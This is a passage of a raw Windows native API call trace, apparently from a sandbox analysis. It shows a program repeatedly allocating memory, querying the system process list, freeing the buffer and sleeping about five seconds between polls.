ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.815] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.903] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 